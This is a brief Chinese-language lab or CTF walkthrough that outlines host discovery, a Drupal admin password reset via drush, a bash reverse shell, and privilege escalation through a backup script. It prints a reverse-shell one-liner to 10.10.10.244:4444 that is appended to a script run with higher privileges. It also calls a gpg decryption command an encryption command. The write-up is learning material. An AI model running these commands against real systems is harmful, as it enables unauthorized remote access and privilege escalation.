一、漏洞利用型別

web管理軟體漏洞

web外掛漏洞

二、滲透思路：

1.主機探測

2.web滲透

2.1資訊蒐集

3.ssh遠端登入

3.1資訊蒐集

3.2利用web管理應用，修改admin密碼，進入後臺。

4.利用web應用反彈shell

5.利用日誌管理指令碼提權

三、學到知識點：

1.gpg

GnuPG軟體（簡稱GPG），它是目前最流行、最好用的加密工具之一。

gpg -d website.tar.gz.gpg > website.tar.gz

 使用gpg對檔案進行加密

2.drush

Drush是一款以命令列方式和Unix指令碼介面管理Drupal的軟體。

drush user-password admin --password="123456"

修改admin使用者的密碼 

3. Linux bash反彈shell

 echo "bash -i >& /dev/tcp/10.10.10.244/4444 0>&1" >> /opt/scripts/backups.sh

bash -i 產生一個互動式bash，bash 是linux 的一個比較常見的shell,其實linux的shell還有很多，比如 sh、zsh、等，他們之間有著細小差別），-i 這個引數表示的是產生互動式的shell

>& /dev/tcp/ip/port 建立TCP連線，並將標準輸出和錯誤重定向到TCP連線，/dev/tcp|udp/ip/port 這個檔案是特別特殊的，實際上可以將其看成一個裝置（Linux下一切皆檔案），其實如果你訪問這個檔案的位置他是不存在的。

0>&1 從TCP連接獲取輸入

四、參考：

https://blog.csdn.net/weixin_45605352/article/details/119513996